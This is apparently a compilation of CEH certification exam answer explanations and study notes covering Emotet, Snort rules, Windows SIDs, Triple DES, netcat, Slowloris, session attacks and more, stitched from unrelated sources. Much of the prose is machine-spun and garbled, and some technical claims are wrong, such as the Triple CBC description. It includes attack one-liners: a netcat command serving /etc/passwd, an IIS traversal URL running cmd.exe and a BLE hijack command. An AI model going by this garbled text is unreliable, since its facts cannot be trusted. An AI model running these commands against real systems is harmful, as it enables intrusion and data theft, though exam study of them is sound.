greed, the victim picks up the device and opens it up on their system, which downloads the

bait. Once the bait is downloaded, a piece of malicious software installs on the victim's system,

giving the attacker access.

Currently, Emotet uses five known spreader modules: NetPass.exe, WebBrowserPassView, Mail PassView, Outlook scraper, and a credential enumerator. Credential enumerator is a self-extracting RAR file containing two components: a bypass component and a service component. The bypass component is used for the enumeration of network resources and either finds writable share drives using Server Message Block (SMB) or tries to brute force user accounts, including the administrator account. Once an available system is found, Emotet writes the service component on the system, which writes Emotet onto the disk. Emotet’s access to SMB can result in the infection of entire domains (servers and clients).

The given rule syntax is consistent with Snort, a popular open-source Intrusion Detection System (IDS). This rule alerts when any TCP traffic from any source IP and port is sent to IPs within the 192.168.100.0/24 subnet on port 21 (FTP), triggering the alert message: “FTP on the network!”

The Snort rule format is:

alert protocol source_IP source_port -> destination_IP destination_port (rule_options)

CEH v13 course materials teach this rule format under IDS/IPS configuration.

From CEH v13 Guide:

“Snort rules are used in IDS/IPS to define suspicious traffic patterns. An example rule: alert tcp any any -> 192.168.1.0/24 21 (msg: 'FTP detected') triggers an alert on FTP traffic within a subnet.”

Incorrect Options:

A/C. IP tables are used in firewalls and routers but follow a completely different syntax.

B. FTP servers do not use such alerting rules.

Reference – CEH v13 Study Guide:

Module 12: Evading IDS, Firewalls, and Honeypots

Section: Snort IDS Configuration

===========

In a Windows system, a Security Identifier (SID) uniquely identifies each user and group. The SID format is:

S-1-5-21--

The Relative Identifier (RID) is the last component in the SID string.

According to Microsoft and CEH v13:

RID 500 → Built-in Administrator account

RID 501 → Guest account

RIDs > 1000 → Regular user accounts

In the given image, the SID:

s-1-5-21-1125394485-807628933-54978560-500chang

has a RID of 500, indicating the built-in administrator account.

From CEH v13:

Module 4: Enumeration

Topic: SID Enumeration

CEH v13 States:

“When enumerating Windows systems, the account with RID 500 is always the default Administrator account, unless renamed. Attackers often target this account due to its elevated privileges.”

Incorrect Options:

All others have RIDs not equal to 500 (e.g., 100, 652, 412, etc.)

Triple DES is another mode of DES operation. It takes three 64-bit keys, for an overall key length of 192 bits. In Stealth, you merely type within the entire 192-bit (24 character) key instead of entering each of the three keys individually. The Triple DES DLL then breaks the user-provided key into three subkeys, padding the keys if necessary in order that they are each 64 bits long. The procedure for encryption is strictly an equivalent as regular DES, but it’s repeated 3 times , hence the name Triple DES. the info is encrypted with the primary key, decrypted with the second key, and eventually encrypted again with the third key.

Triple DES runs 3 times slower than DES, but is far safer if used properly. The procedure for decrypting something is that the same because the procedure for encryption, except it’s executed in reverse. Like DES, data is encrypted and decrypted in 64-bit chunks. Although the input key for DES is 64 bits long, the particular key employed by DES is merely 56 bits long . the smallest amount significant (right-most) bit in each byte may be a parity , and will be set in order that there are always an odd number of 1s in every byte. These parity bits are ignored, so only the seven most vital bits of every byte are used, leading to a key length of 56 bits. this suggests that the effective key strength for Triple DES is really 168 bits because each of the three keys contains 8 parity bits that aren’t used during the encryption process.

Triple DES Modes

Triple ECB (Electronic Code Book)

• This variant of Triple DES works precisely the same way because the ECB mode of DES.

• this is often the foremost commonly used mode of operation.

Triple CBC (Cipher Block Chaining)

• This method is extremely almost like the quality DES CBC mode.

• like Triple ECB, the effective key length is 168 bits and keys are utilized in an equivalent manner, as described above, but the chaining features of CBC mode also are employed.

• the primary 64-bit key acts because the Initialization Vector to DES.

• Triple ECB is then executed for one 64-bit block of plaintext.

• The resulting ciphertext is then XORed with subsequent plaintext block to be encrypted, and therefore the procedure is repeated.

• This method adds an additional layer of security to Triple DES and is therefore safer than Triple ECB, although it’s not used as widely as Triple ECB.

In the context of security testing, test automation plays a critical role in improving the speed and consistency of testing activities. However, it cannot entirely replace manual testing because certain security vulnerabilities—especially logic flaws or issues with session management—often require human intuition and contextual understanding.

According to CEH v13 Official Courseware – Module 05 (Vulnerability Analysis), and confirmed in the CEH v13 Study Guide, automated testing is best suited for:

Repetitive benchmark tests

Regression testing

Scanning for known vulnerabilities

Ensuring consistency across environments

However, manual testing is still essential for:

Business logic testing

Security misconfiguration identification

Discovering zero-day flaws

In CEH v13 Module 04: Enumeration and Module 06: Malware Threats, when investigating Command-and-Control (C2) communication, it is important to determine whether the communication actually occurred and what data was sent.

C. Internet Firewall/Proxy log

Best source to confirm outbound connections to external IPs.

Proxy logs show which internal host made the connection, the timestamp, and sometimes even URL and payload.

Firewalls can indicate port usage, traffic volume, and connection duration.

This data gives a direct view of how severe the incident is, whether data exfiltration occurred, and which internal system is affected.

Why Other Options Are Less Effective Initially:

A. IDS Log: Only tells you that an alert was generated. May be false positive or triggered by a failed connection.

B. Event logs on Domain Controller: Useful for user account behavior, but not for network connections.

D. Event logs on the PC: May lack detail or be tampered with by malware.

Comprehensive and Detailed Explanation:

In TCP session hijacking or spoofing:

An attacker sends a spoofed packet with the ACK bit set and a guessed (or predicted) sequence number to fool the receiver into thinking it's a legitimate continuation of an existing session.

Fred is simulating this by sending a TCP packet with the ACK bit and using his own IP as the source, trying to trick the switch into believing it's part of an already established session.

From CEH v13 Courseware:

Module 11: Session Hijacking

Btlejack is a tool used for attacking Bluetooth Low Energy (BLE) connections, including sniffing, jamming, and hijacking.

The -f option specifies the access address of the BLE connection.

The -j option is used to hijack an active BLE connection.

Therefore, the correct syntax to hijack a BLE connection is:

btlejack -f [access_address] -j

This matches Option A: btlejack -f 0x129f3244 -j

Incorrect Options:

B. -c any is used for sniffing any advertising packet but not for hijacking.

C. -d specifies device paths; -s starts a scan but does not hijack.

D. This is likely a malformed or unrelated command in the context of hijacking.

Reference – CEH v13 Official Courseware:

Module 18: IoT and OT Hacking

Section: “Bluetooth Low Energy (BLE) Attacks”

Tool Focus: “Btlejack Command Usage”

CEH iLab: Btlejacking with micro:bit

Nikto is a free software command-line vulnerability scanner that scans web servers for dangerous files/CGIs, outdated server software, and other problems. It performs generic and server types specific checks. It also captures and prints any cookies received. The Nikto code itself is free software, but the data files it uses to drive the program are not.

User-directed spidering is a technique that allows the hacker to manually browse the target website and use a proxy or spider tool to capture and analyze the traffic. This way, the hacker can discover hidden or dynamic content that standard web spiders may miss due to a specific file in the root directory, such as robots.txt, that instructs them not to crawl certain pages or directories. User-directed spidering can also help the hacker to bypass authentication or authorization mechanisms, as well as identify vulnerabilities or sensitive information in the target website. User-directed spidering can be performed with tools like Burp Suite and WebScarab, which are web application security testing tools that can intercept, modify, and replay HTTP requests and responses, as well as perform various attacks and scans on the target website.

The other options are not likely to achieve the same results as user-directed spidering. Using Photon to retrieve archived URLs of the target website from archive.org may provide some historical information about the website, but it may not reflect the current state or content of the website. Using the Netcraft tool to gather website information may provide some general information about the website, such as its IP address, domain name, server software, or hosting provider, but it may not reveal the specific files or web pages on the website. Examining HTML source code and cookies may provide some clues about the website’s structure, functionality, or user preferences, but it may not expose the hidden or dynamic content that user-directed spidering can discover. References:

User Directed Spidering with Burp

Web Spidering - What Are Web Crawlers & How to Control Them

Web Security: Recon

Mapping the Application for Penetrating Web Applications — 1

The purpose of this idea is to permit multiple customers to figure on joint projects and applications that belong to the community, where it’s necessary to possess a centralized clouds infrastructure. In other words, Community Cloud may be a distributed infrastructure that solves the precise problems with business sectors by integrating the services provided by differing types of clouds solutions.

The communities involved in these projects, like tenders, business organizations, and research companies, specialise in similar issues in their cloud interactions. Their shared interests may include concepts and policies associated with security and compliance considerations, and therefore the goals of the project also .

Community Cloud computing facilitates its users to spot and analyze their business demands better. Community Clouds could also be hosted during a data center, owned by one among the tenants, or by a third-party cloud services provider and may be either on-site or off-site.

Community Cloud Examples and Use Cases

Cloud providers have developed Community Cloud offerings, and a few organizations are already seeing the advantages . the subsequent list shows a number of the most scenarios of the Community Cloud model that’s beneficial to the participating organizations.

Multiple governmental departments that perform transactions with each other can have their processing systems on shared infrastructure. This setup makes it cost-effective to the tenants, and may also reduce their data traffic.

Benefits of Community Clouds

Community Cloud provides benefits to organizations within the community, individually also as collectively. Organizations don’t need to worry about the safety concerns linked with Public Cloud due to the closed user group.

This recent cloud computing model has great potential for businesses seeking cost-effective cloud services to collaborate on joint projects, because it comes with multiple advantages.

Openness and Impartiality

Community Clouds are open systems, and that they remove the dependency organizations wear cloud service providers. Organizations are able to do many benefits while avoiding the disadvantages of both public and personal clouds.

Flexibility and Scalability

Ensures compatibility among each of its users, allowing them to switch properties consistent with their individual use cases. They also enable companies to interact with their remote employees and support the utilization of various devices, be it a smartphone or a tablet. This makes this sort of cloud solution more flexible to users’ demands.

Consists of a community of users and, as such, is scalable in several aspects like hardware resources, services, and manpower. It takes under consideration demand growth, and you simply need to increase the user-base.

High Availability and Reliability

Your cloud service must be ready to make sure the availability of knowledge and applications in the least times. Community Clouds secure your data within the same way as the other cloud service, by replicating data and applications in multiple secure locations to guard them from unforeseen circumstances.

Cloud possesses redundant infrastructure to form sure data is out there whenever and wherever you would like it. High availability and reliability are critical concerns for any sort of cloud solution.

Security and Compliance

Two significant concerns discussed when organizations believe cloud computing are data security and compliance with relevant regulatory authorities. Compromising each other’s data security isn’t profitable to anyone during a Community Cloud.

Users can configure various levels of security for his or her data. Common use cases:

the power to dam users from editing and downloading specific datasets.

Making sensitive data subject to strict regulations on who has access to Sharing sensitive data unique to a specific organization would bring harm to all or any the members involved.

What devices can store sensitive data.

Convenience and Control

Conflicts associated with convenience and control don’t arise during a Community Cloud. Democracy may be a crucial factor the Community Cloud offers as all tenants share and own the infrastructure and make decisions collaboratively. This setup allows organizations to possess their data closer to them while avoiding the complexities of a personal Cloud.

Less Work for the IT Department

Having data, applications, and systems within the cloud means you are doing not need to manage them entirely. This convenience eliminates the necessity for tenants to use extra human resources to manage the system. Even during a self-managed solution, the work is split among the participating organizations.

Environment Sustainability

In the Community Cloud, organizations use one platform for all their needs, which dissuades them from investing in separate cloud facilities. This shift introduces a symbiotic relationship between broadening and shrinking the utilization of cloud among clients. With the reduction of organizations using different clouds, resources are used more efficiently, thus resulting in a smaller carbon footprint.

A Protocol Analyzer is the correct tool used to examine the contents of packet data (often stored in .pcap files) to determine if a particular sequence of traffic is suspicious, malformed, or part of a known exploit.

In CEH v13:

Module 3: Scanning Networks

Module 4: Enumeration

Module 5: Vulnerability Analysis

Related Lab: Packet Analysis using Wireshark

The CEH v13 Study Guide states:

“A protocol analyzer (e.g., Wireshark) captures and decodes packets to display their contents and help analysts understand communication flows and anomalies. It is used to manually inspect packet contents and behavior, which helps distinguish legitimate traffic from attacks.”

PCAP (Packet Capture) files are typically analyzed using tools like Wireshark. These tools decode protocol layers and show payloads, making it easier for analysts to identify if IDS alerts were accurate or false positives.

Incorrect Options:

B. Network sniffer: General term; protocol analyzer is the specific functional tool used.

C. IPS: Prevents or blocks malicious traffic, but does not analyze existing packet captures.

D. Vulnerability scanner: Identifies vulnerabilities on systems/services; not used for packet capture review.

Command Breakdown:

nc: Netcat utility

-l: Listen mode

-u: Use UDP protocol

-p 55555: Listen on port 55555

< /etc/passwd: Redirects the contents of /etc/passwd into the socket

This means that when a connection is made to UDP port 55555, the contents of /etc/passwd will be sent to the connecting host.

From CEH v13 Courseware:

Module 8: Sniffing & Network Communication Tools

CEH v13 Study Guide states:

“Netcat can be used to serve files, open shells, or transfer data. Using input redirection, it can stream file contents to anyone who connects.”

Incorrect Options:

A: Does not log; it outputs /etc/passwd

C: The opposite; it serves the file, doesn’t grab it

D: Netcat does not delete files with this syntax

Bluedriving is a bluetooth wardriving utility. It can capture bluetooth devices, lookup their services, get GPS information and present everything in a nice web page. It can search for and show a lot of information about the device, the GPS address and the historic location of devices on a map. The main motivation of this tool is to research about the targeted surveillance of people by means of its cellular phone or car. With this tool you can capture information about bluetooth devices and show, on a map, the points where you have seen the same device in the past.

CEH identifies spear-phishing as a targeted, context-rich social engineering method tailored to specific individuals or departments. By incorporating accurate insider details, attackers significantly increase trust and likelihood of disclosure.

The CEH v13 content explains that stealth scanning involves modifying scan timing parameters to reduce packet frequency, randomize intervals, and avoid recognizable patterns typically flagged by intrusion detection systems. Slow, randomized timing—often achieved with Nmap’s T0 or T1 timing templates—prevents bursts of traffic and allows scans to blend into normal network noise. IDS/IPS systems tuned for high-volume events may fail to detect such gradual reconnaissance. Fast SYN scans generate distinctive patterns easily identified by security monitoring tools. UDP scans, especially across all ports, produce high traffic volume and are extremely noisy. Xmas scans, although sometimes used for stealth against stateless filters, are still signature-detectable and inappropriate when stealth over time is required. Therefore, applying slow, randomized timing options aligns with CEH-approved reconnaissance techniques for evading detection while enumerating open ports.

In CEH’s web application and mobile security modules, improper session management is defined as a failure to enforce session expiration, token invalidation, or secure session lifecycle controls. When an application does not invalidate a session token after logout, attackers can exploit this by performing a replay attack: reusing previously captured session identifiers to impersonate the user and gain unauthorized access. CEH teaches that replaying a live token is the simplest and most direct exploitation method because it does not require guessing or stealing new tokens—the attacker simply reuses a valid one that should have been invalidated. CSRF relies on exploiting a user’s active session and is not required when the attacker already possesses a reusable token. Brute-forcing session tokens is computationally expensive and unnecessary. SQL injection is unrelated to session lifecycle flaws unless token storage is directly exposed. Therefore, a replay attack is the correct exploitation method.

In a session donation attack, the attacker donates their own session ID to the target user. In this

attack, the attacker first obtains a valid session ID by logging into a service and later feeds the same session ID to the target user. This session ID links a target user to the attacker's account page without disclosing any information to the victim. When the target user clicks on the link and enters the details (username, password, payment details, etc.) in a form, the entered

details are linked to the attacker's account. To initiate this attack, the attacker can send their

session ID using techniques such as cross-site cooking, an MITM attack, and session fixation. A

session donation attack involves the following steps.

PGP (Pretty Good Privacy), SSL (Secure Sockets Layer), and IKE (Internet Key Exchange) use Public Key Cryptography for secure communication. They utilize:

Public and private key pairs

Asymmetric encryption for key exchange

Symmetric encryption for data confidentiality (after key exchange)

These protocols ensure secure data transfer over insecure networks.

Reference – CEH v13 Official Study Guide:

Module 20: Cryptography

Quote:

“Public key cryptography uses asymmetric key pairs for encryption and authentication. Protocols like PGP, SSL/TLS, and IKE rely on this to exchange keys and establish trust.”

Incorrect Options:

A & D. Digest/hash algorithms (e.g., MD5, SHA) ensure integrity, not encryption

B. Secret key refers to symmetric encryption, which is used after the public key exchange, not as the basis for these protocols

According to CEH v13, one of the most effective defenses against rogue DHCP servers is DHCP snooping, a Layer 2 security feature that classifies switch ports as either trusted or untrusted. DHCP responses are permitted only on trusted ports, typically those connected to legitimate DHCP servers. Any DHCP OFFER or ACK originating from an untrusted port is dropped automatically. In the scenario, the rogue DHCP server is sending unauthorized configuration settings because the switch is forwarding DHCP messages from all ports without restriction. CEH specifically warns that unmanaged or misconfigured switches allow rogue DHCP servers to assign malicious DNS, gateway, or IP configurations, enabling traffic redirection, interception, or man-in-the-middle attacks. ARP inspection (Option B) protects against ARP spoofing but not DHCP abuses. Port security (Option C) prevents MAC flooding, not DHCP impersonation. Static reservations (Option D) do not scale and do not stop rogue DHCP servers. DHCP snooping directly mitigates this threat.

CEH explains that MAC flooding overwhelms a switch’s CAM table, causing it to fail open. When the table fills, the switch broadcasts frames out all ports, behaving like a hub. This exposes unicast traffic to attackers operating in promiscuous mode.

A digital signature is created by hashing the document and encrypting that hash with the sender’s private key. Since the hash is specific to the original content, any change to the document invalidates the signature, making it non-transferable to another document.

Reference – CEH v13 Official Study Guide:

Module 20: Cryptography

Quote:

“Digital signatures are based on hashing the document and signing the digest with the private key. This makes each signature unique to the document and ensures tamper resistance.”

Incorrect Options:

B. Incorrect — signature is tied to one document.

C. Hashes are not plain; they are encrypted.

D. Keys can be reused, but signatures are document-specific.

DNS cache snooping is an enumeration technique where the attacker queries a DNS server to check whether a specific domain has been recently resolved by the server (i.e., it exists in the cache). If a positive response is received with low latency, it indicates that the domain was visited recently.

Key points:

Used to infer user browsing habits or visited domains.

Helps attackers identify user interests or potential targets.

Incorrect Options:

A. DNS zone walking is used to list all domain names in a DNS zone (with misconfigured DNS servers), not for cached record inspection.

C. DNSSEC zone walking applies only when DNSSEC is misconfigured.

D. DNS cache poisoning is a manipulation technique, not a passive enumeration method.

Reference – CEH v13 Official Courseware:

Module 04: Enumeration

Section: “DNS Enumeration”

Subsection: “DNS Cache Snooping and Timing Analysis”

Tool Reference: dig, nslookup

===========

ARP Spoofing Attack ARP packets can be forged to send data to the attacker’s machine.Attackers flood a target computer’s ARP cache with forged entries, which is also known as poisoning. (P.1143/1127)

Syslog messages are typically sent over UDP or TCP port 514 to the Syslog server. In this case, Snort (192.168.0.99) should send alerts to Kiwi Syslog (192.168.0.150) using TCP/UDP port 514.

The correct Wireshark filter to check if Snort is sending the messages to the Syslog server is:

tcp.dstport==514 && ip.dst==192.168.0.150

Reference – CEH v13 Official Study Guide:

Module 8: Sniffing

Topic: Packet Sniffing and Analysis

Quote:

“Wireshark filters like tcp.dstport and ip.dst can be used to verify outbound logs and traffic from intrusion detection systems.”

Incorrect Options:

A & B: Use incorrect IP addresses or direction

C: Uses incorrect destination IP (should be the Syslog server)

===========

LAN Manager (LM) hashes use the DES (Data Encryption Standard) algorithm to hash passwords. Here's how LM hashing works:

The password is converted to uppercase and padded/truncated to 14 characters.

Split into two 7-character halves.

Each half is used as a DES key to encrypt a constant string ("KGS!@#$%")—resulting in a 16-byte LM hash.

From CEH v13 Courseware:

Module 6: Malware Threats

Topic: Windows Password Storage & Cracking

CEH v13 Study Guide states:

“LM hashes use the DES encryption algorithm to create password hashes. Due to this method, they are highly vulnerable to brute-force attacks, particularly because they split the password into two 7-character blocks.”

Incorrect Options:

A: MD4 is used in NTLM hashes.

C: SHA is not used in LM.

D: SSL is a transport security protocol, not a hashing algorithm.

Zero Trust Networks The Zero Trust model is a security implementation that by default assumes every user trying to access the network is not a trusted entity and verifies every incoming connection before allowing access to the network.It strictly follows the principle, “Trust no one and validate before providing a cloud service or granting access permission.”It also allows companies to impose conditions, such as allowing employees to only access the appropriate resources required for their work role. (P.2997/2981)

Zero Trust is a strategic initiative that helps prevent successful data breaches by eliminating the concept of trust from an organization’s network architecture. Rooted in the principle of “never trust, always verify,” Zero Trust is designed to protect modern digital environments by leveraging network segmentation, preventing lateral movement, providing Layer 7 threat prevention, and simplifying granular user-access control.

This log clearly shows an HTTP GET request attempting to exploit a web server using a directory traversal attack with Unicode encoding:

The URL contains:/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:

%c0%af is a known Unicode-encoded sequence used to bypass input validation filters.It translates to the forward slash character “/” when interpreted by vulnerable versions of Microsoft IIS (specifically IIS 4.0 and 5.0).

This type of attack attempts to:

Traverse out of the web root directory (via encoded ../ sequences)

Access cmd.exe in the Windows system32 directory

Execute operating system commands such as dir c: (list contents of drive C)

From CEH v13 Official Courseware:

Module 14: Hacking Web Servers

Topic: Unicode Directory Traversal Vulnerability (IIS-specific)

CEH v13 Study Guide states:

“A Unicode Directory Traversal Attack takes advantage of improper input sanitization by encoding traversal characters (../) as Unicode (e.g., %c0%af). This bypasses input filters and accesses restricted directories such as system32.”

Incorrect Options:

A. Hexcode Attack: Not a formal classification; here Unicode encoding is used.

B. Cross-Site Scripting: Involves injecting scripts into a web page, unrelated to filesystem traversal.

C. Multiple Domain Traversal: Not a valid or recognized attack type.

Developed by Robert “RSnake” Hansen, Slowloris is DDoS attack software that permits one computer to require down an internet server. Due the straightforward yet elegant nature of this attack, it requires minimal bandwidth to implement and affects the target server’s web server only, with almost no side effects on other services and ports.

Slowloris has proven highly-effective against many popular sorts of web server software, including Apache 1.x and 2.x.

Over the years, Slowloris has been credited with variety of high-profile server takedowns. Notably, it had been used extensively by Iranian ‘hackivists’ following the 2009 Iranian presidential election to attack Iranian government internet sites .

Slowloris works by opening multiple connections to the targeted web server and keeping them open as long as possible. It does this by continuously sending partial HTTP requests, none of which are ever completed. The attacked servers open more and connections open, expecting each of the attack requests to be completed.

Periodically, the Slowloris sends subsequent HTTP headers for every request, but never actually completes the request. Ultimately, the targeted server’s maximum concurrent connection pool is filled, and extra (legitimate) connection attempts are denied.

By sending partial, as against malformed, packets, Slowloris can easily elapse traditional Intrusion Detection systems.

Named after a kind of slow-moving Asian primate, Slowloris really does win the race by moving slowly and steadily. A Slowloris attack must await sockets to be released by legitimate requests before consuming them one by one.

For a high-volume internet site , this will take a while . the method are often further slowed if legitimate sessions are reinitiated. But within the end, if the attack is unmitigated, Slowloris—like the tortoise—wins the race.

If undetected or unmitigated, Slowloris attacks also can last for long periods of your time . When attacked sockets outing , Slowloris simply reinitiates the connections, continuing to reach the online server until mitigated.

Designed for stealth also as efficacy, Slowloris are often modified to send different host headers within the event that a virtual host is targeted, and logs are stored separately for every virtual host.

More importantly, within the course of an attack, Slowloris are often set to suppress log file creation. this suggests the attack can catch unmonitored servers off-guard, with none red flags appearing in log file entries.

Methods of mitigation

Imperva’s security services are enabled by reverse proxy technology, used for inspection of all incoming requests on their thanks to the clients’ servers.

Imperva’s secured proxy won’t forward any partial connection requests—rendering all Slowloris DDoS attack attempts completely and utterly useless.

A service-based solution offered by an auditing firm would be the most appropriate type of vulnerability assessment solution for the large e-commerce organization, given their requirements. A service-based solution is a type of vulnerability assessment that is performed by external experts who have the skills, tools, and experience to conduct a thorough and comprehensive analysis of the target system or network. A service-based solution can imitate the outside view of attackers, as the experts are not familiar with the internal details or configurations of the organization. A service-based solution can also perform well-organized inference-based testing, which is a type of testing that uses logical reasoning and deduction to identify and exploit vulnerabilities based on the information gathered from the target. A service-based solution can scan automatically against continuously updated databases, as the experts have access to the latest security intelligence and threat feeds. A service-based solution can also support multiple networks, as the experts can use different techniques and tools to scan different types of networks, such as wired, wireless, cloud, or hybrid12.

The other options are not as appropriate as option B for the following reasons:

A. Inference-based assessment solution: This option is not a type of vulnerability assessment solution, but a type of testing method that can be used by any solution. Inference-based testing is a testing method that uses logical reasoning and deduction to identify and exploit vulnerabilities based on the information gathered from the target. Inference-based testing can be performed by service-based, product-based, or tree-based solutions, depending on the scope, objectives, and resources of the assessment3.

C. Tree-based assessment approach: This option is not a type of vulnerability assessment solution, but a type of testing method that can be used by any solution. Tree-based testing is a testing method that uses a hierarchical structure to organize and prioritize the vulnerabilities based on their severity, impact, and exploitability. Tree-based testing can be performed by service-based, product-based, or inference-based solutions, depending on the scope, objectives, and resources of the assessment4.

D. Product-based solution installed on a private network: This option is a type of vulnerability assessment solution, but it may not meet all the requirements of the large e-commerce organization. A product-based solution is a type of vulnerability assessment that is performed by using software or hardware tools that are installed on the organization’s own network. A product-based solution can scan automatically against continuously updated databases, as the tools can be configured to download and apply the latest security updates and patches. However, a product-based solution may not imitate the outside view of attackers, as the tools may have limited access or visibility to the external network or the internet. A product-based solution may also not perform well-organized inference-based testing, as the tools may rely on predefined rules or signatures to detect and report vulnerabilities, rather than using logical reasoning and deduction. A product-based solution may also not support multiple networks, as the tools may be designed or optimized for a specific type of network, such as wired, wireless, cloud, or hybrid .

Comprehensive and Detailed Explanation:

Wireshark on Windows requires WinPcap to operate. WinPcap is a packet capture library that allows network interfaces to operate in promiscuous mode, which is essential for sniffing traffic.

From CEH v13 Courseware:

Module 8: Sniffing → Sniffing Tools → WinPcap for Windows

YARA rules are a powerful way to detect and classify malware based on patterns, signatures, and behaviors. They can be used to complement Snort rules, which are mainly focused on network traffic analysis. However, writing YARA rules manually can be time-consuming and error-prone, especially when dealing with large and diverse malware samples. Therefore, using a tool that can automate or assist the generation of YARA rules can be very helpful for ethical hackers.

Among the four options, yarGen is the best choice for this purpose, because it generates YARA rules from strings identified in malware files while removing strings that also appear in goodware files. This way, yarGen can reduce the false positives and increase the accuracy of the YARA rules. yarGen also supports various features, such as whitelisting, scoring, wildcards, and regular expressions, to improve the quality and efficiency of the YARA rules.

The other options are not as suitable as yarGen for this purpose. AutoYara is a tool that automates the generation of YARA rules from a set of malicious and benign files, but it does not perform any filtering or optimization of the strings, which may result in noisy and ineffective YARA rules. YaraRET is a tool that helps in reverse engineering Trojans to generate YARA rules, but it is limited to a specific type of malware and requires manual intervention and analysis. koodous is a platform that combines social networking with antivirus signatures and YARA rules to detect malware, but it is not a tool for generating YARA rules, rather it is a tool for sharing and collaborating on YARA rules. References:

yarGen - A Tool to Generate YARA Rules

YARA Rules: The Basics

Why master YARA: from routine to extreme threat hunting cases

Non-repudiation is the assurance that someone cannot deny the validity of something. Non-repudiation is a legal concept that is widely used in information security and refers to a service, which provides proof of the origin of data and the integrity of the data. In other words, non-repudiation makes it very difficult to successfully deny who/where a message came from as well as the authenticity and integrity of that message.

Operation Cloud Hopper was an in depth attack and theft of data in 2017 directed at MSP within the uk (U.K.), us (U.S.), Japan, Canada, Brazil, France, Switzerland, Norway, Finland, Sweden, South Africa , India, Thailand, South Korea and Australia. The group used MSP as intermediaries to accumulate assets and trade secrets from MSP client engineering, MSP industrial manufacturing, retail, energy, pharmaceuticals, telecommunications, and government agencies.

Operation Cloud Hopper used over 70 variants of backdoors, malware and trojans. These were delivered through spear-phishing emails. The attacks scheduled tasks or leveraged services/utilities to continue Microsoft Windows systems albeit the pc system was rebooted. It installed malware and hacking tools to access systems and steal data.

Comprehensive Explanation from CEH v13 Courseware:

CEH v13 explains that TOCTOU (Time-of-Check Time-of-Use) vulnerabilities arise when a system checks a condition (such as file permissions) and then later uses the resource based on that assumption. If there is even a tiny gap between the validation and the actual use, attackers can exploit this race condition by replacing or modifying the resource after validation but before execution. This is common in file-handling operations involving temporary files, symbolic links, or shared directories. CEH emphasizes that TOCTOU attacks often lead to privilege escalation, unauthorized execution, or tampering with data because the system trusts the earlier validation step. The attacker swaps the file at precisely the right moment, taking advantage of a race window. The other options—certificate validation, integer overflow, and null pointer dereference—do not involve timing-based race conditions. The scenario exactly matches CEH’s description of TOCTOU exploitation, where attackers manipulate file access in the interval between validation and execution.

IoT devices often suffer from weak or missing encryption protocols, creating opportunities for attackers to intercept sensitive information. CEH courseware highlights that when device-to-app communication occurs in plaintext, a man-in-the-middle attack becomes one of the most effective exploitation methods. By positioning themselves between the device and the mobile application, the attacker can observe all transmitted data, including configuration updates, authentication tokens, and personal information. Tools such as Wireshark, mitmproxy, and specialized IoT interception frameworks allow testers to capture packets, decode protocols, and reconstruct application logic. The CEH curriculum stresses the importance of evaluating IoT device communication channels, because many rely on unsecured HTTP or proprietary plaintext protocols. Brute-force attempts, SQL injection, or dictionary attacks do not directly target the device–app communication pathway and would not exploit the fundamental weakness present here: lack of encryption. A MitM attack directly takes advantage of this flaw and provides comprehensive visibility into all transmitted data, making it the most effective and CEH-aligned method of exploitation.

Enumeration is the process of extracting usernames, shares, services, and other system-specific information from a target system. Tools used for enumeration include:

B. USER2SID: Resolves a username to its associated Security Identifier (SID).

D. SID2USER: Resolves an SID back to the corresponding username.

E. DumpSec: A powerful GUI tool used to enumerate users, shares, and permissions on Windows systems.

From CEH v13 Courseware:

Module 4: Enumeration

Section: NetBIOS and Windows Enumeration Tools

CEH v13 Study Guide states:

“USER2SID and SID2USER are classic tools used to map usernames to SIDs and vice versa during Windows enumeration. DumpSec can enumerate user accounts, group memberships, and shared resources on systems with open permissions.”

Incorrect Options:

A. SolarWinds: Primarily a network performance monitoring tool, not designed for enumeration.

C. Cheops: A network mapping tool, not an enumeration utility.

The CEH web server attack methodology describes reconnaissance as a key phase, where testers gather publicly available information before attempting exploitation. Robots.txt is commonly used by administrators to instruct web crawlers about which directories should not be indexed. CEH emphasizes that attackers regularly review robots.txt because it often exposes sensitive directories unintentionally, providing valuable intelligence about internal structure, configuration paths, administrative pages, and potential weak points. In this scenario, the tester observes “Disallow” entries and then discovers the directories are not protected by authentication, allowing direct access to sensitive files. This falls under information gathering through exposed indexing instructions rather than directory traversal, which involves path-manipulation exploits. The tester is not altering file paths or inserting traversal sequences; instead, they are reviewing publicly available indexing instructions and discovering misconfigured access controls. This perfectly aligns with the reconnaissance phase of the CEH methodology, where attackers learn about server architecture using passive or minimally intrusive techniques.

A DMZ (Demilitarized Zone) is a physical or logical subnet that separates an internal local area network (LAN) from untrusted networks—typically the Internet. It allows an organization to provide external-facing services while isolating internal systems from direct exposure.

From CEH v13 Official Courseware:

Module 13: Hacking Web Applications

Module 14: Hacking Web Servers

Module 1: Introduction to Ethical Hacking – Security Architecture Concepts

CEH v13 clearly outlines:

“A DMZ is critical when deploying Internet-facing servers such as web servers, FTP servers, or mail servers. It provides a buffer zone that allows public access to specific resources while keeping the internal network isolated.”

Bob’s assumption is flawed for several reasons:

DMZs can be implemented even with stateless firewalls using strict access control rules.

Relying solely on IP-based filtering is error-prone and doesn’t offer layered defense.

A DMZ provides an essential layer of segmentation, protecting internal assets from compromised public servers.

Incorrect Options:

A/D: DMZ can still make sense even with stateless firewalls if properly configured.

B: IP filtering is insufficient as a sole security measure; does not replace the need for network segmentation.

*REST is not a specification, tool, or framework, but instead is an architectural style for web services that serves as a communication medium between various systems on the web. *RESTful APIs, which are also known as RESTful services, are designed using REST principles and HTTP communication protocols RESTful is a collection of resources that use HTTP methods such as PUT, POST, GET, and DELETE

RESTful API: RESTful API is a RESTful service that is designed using REST principles and HTTP communication protocols. RESTful is a collection of resources that use HTTP methods such as PUT, POST, GET, and DELETE. RESTful API is also designed to make applications independent to improve the overall performance, visibility, scalability, reliability, and portability of an application. APIs with the following features can be referred to as to RESTful APIs: o Stateless: The client end stores the state of the session; the server is restricted to save data during the request processing o Cacheable: The client should save responses (representations) in the cache. This feature can enhance API performance pg. 1920 CEHv11 manual.

The HTTP methods GET, POST, PUT or PATCH, and DELETE can be used with these templates to read, create, update, and delete description resources for dogs and their owners. This API style has become popular for many reasons. It is straightforward and intuitive, and learning this pattern is similar to learning a programming language API. APIs like this one are commonly called RESTful APIs, although they do not display all of the characteristics that define REST (more on REST later).

“Clearing tracks” is a post-exploitation phase in the ethical hacking methodology in which the attacker removes or alters system evidence to hide their activities and avoid detection. This may include:

Deleting or modifying event logs

Clearing bash history or command history

Removing malware traces

Disabling auditing

From CEH v13:

